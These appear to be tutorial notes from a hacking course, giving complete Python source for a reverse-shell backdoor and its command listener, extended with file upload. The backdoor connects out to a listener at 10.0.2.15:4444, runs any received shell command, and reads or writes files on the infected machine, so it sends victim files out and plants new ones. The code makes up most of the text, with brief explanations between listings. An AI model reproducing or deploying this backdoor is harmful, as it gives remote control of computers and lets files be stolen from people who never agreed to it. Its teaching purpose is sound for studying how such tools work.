#File Upload:
- A file is a series of characters.
- Uploading a file is the opposite of downloading a file.
#To transfer a file we need to:
- Read the file as a sequence of characters.
- Send this sequence of characters.
- Create a new empty file at the destination.
- Store the transferred sequence of characters in the new file.
#CODE: IMPLEMENTING UPLOAD FUNCTION IN LISTENER
- #!/usr/bin/env python
- import socket
- import json
- import base64
- class Listener:
- def __init__(self, ip, port):
- listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
- listener.bind((ip, port))
- listener.listen(0)
- print("[+]Waiting for incomming connection")
- self.connection, address = listener.accept()
- print("[+]Got a connection from" + str(address))
- def json_send(self, data):
- json_data = json.dumps(data)
- self.connection.send(json_data)
- def json_receive(self):
- json_data = ""
- while True:
- try:
- json_data = json_data + self.connection.recv(1024)
- return json.loads(json_data)
- except ValueError:
- continue
- def execute_remotely(self, command):
- self.json_send(command)
- if command[0] == "exit":
- self.connection.close()
- exit()
- return self.json_receive()
- def write_file(self, path, content):
- with open(path, "wb") as file:
- file.write(base64.b64decode(content))
- return "[+] Download sucessfull.."
- def read_file(self, path):
- with open(path, "rb") as file:
- return base64.b64encode(file.read())
- def run(self):
- while True:
- command = raw_input(">> ")
- command = command.split(" ")
- if command[0] == "upload":
- file_content = self.read_file(command[1])
- command.append(file_content)
- #how our list will look like --> ["upload","sample.txt","content of the file"]
- result = self.execute_remotely(command)
- if command[0] == "download":
- fix_blank = " ".join(command[1:])
- result = self.write_file(command[1], result)
- # how our list will look like --> ["upload","sample.txt"]
- print(result)
- my_listener = Listener("10.0.2.15", 4444)
- my_listener.run()
#EXPLANATION
So, as you know, our listener is only able to write files, so when we upload, we want to read a local file from our local computer, therefore we need a method to read a file.
Now, we've already implemented that method in my back door
so I just copy and pasted the read-function in my lisener
and similarly, i copied the write function and pasted it in my backdoor!
So now both our back door and listener have the ability to read and write files, so as you can see, the upload is the opposite of the download.
Now, there is another difference
when we were downloading a file, we read the user input, we splitted
it based on the space(list), so it was made up of two elements.
["download","sample.txt"]
and in our upload function there is an extra element which is content of the file
["download","sample.txt","content of the file"]
#LINE=52-55
- if command[0] == "upload":
- file_content = self.read_file(command[1])
- command.append(file_content)
As u can see we add and another if statement for the upload function
it will open the file and read the content and it will store in the value of the content variable, then we will append this to our command list.
#CODE: IMPLEMENTING UPLOAD FUNCTION IN BACKDOOR
- #!/usr/bin/env python
- import socket
- import subprocess
- import json
- import os
- import base64
- class Backdoor:
- def __init__(self, ip, port):
- self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- self.connection.connect((ip, port))
- def json_send(self, data):
- json_data = json.dumps(data)
- self.connection.send(json_data)
- def json_receive(self):
- json_data = ""
- while True:
- try:
- json_data = json_data + self.connection.recv(1024)
- return json.loads(json_data)
- except ValueError:
- continue
- def execute_system_command(self, command):
- return subprocess.check_output(command, shell=True)
- def change_working_directory_to(self, path):
- os.chdir(path)
- return "[+] Working directory has been changed" + path
- def read_file(self, path):
- with open(path, "rb") as file:
- return base64.b64encode(file.read())
- def write_file(self, path, content):
- with open(path, "wb") as file:
- file.write(base64.b64decode(content))
- return "[+] Upload sucessfull.."
- def run(self):
- while True:
- command = self.json_receive()
- if command[0] == "exit":
- self.connection.close()
- exit()
- elif command[0] == "cd" and len(command) > 1:
- command_result = self.change_working_directory_to(command[1])
- elif command[0] == "download":
- fix_blank = " ".join(command[1:])
- command_result = self.read_file(fix_blank)
- elif command[0] == "upload":
- command_result = self.write_file(command[1], command[2])
- else:
- command_result = self.execute_system_command(command)
- self.json_send(command_result)
- my_backdoor = Backdoor("10.0.2.15", 4444)
- my_backdoor.run()
#EXPLANATION
#LINE=55-56
- elif command[0] == "upload":
- command_result = self.write_file(command[1], command[2])
We cheak if the command is upload than
the result is going to be equal to self.write_file
And the right file method takes the file path and file content
["upload","sample.txt","content of the file"]
- sample.txt = [1]
- content of the file = [2]
As we defined here!
- def write_file(self, path, content):
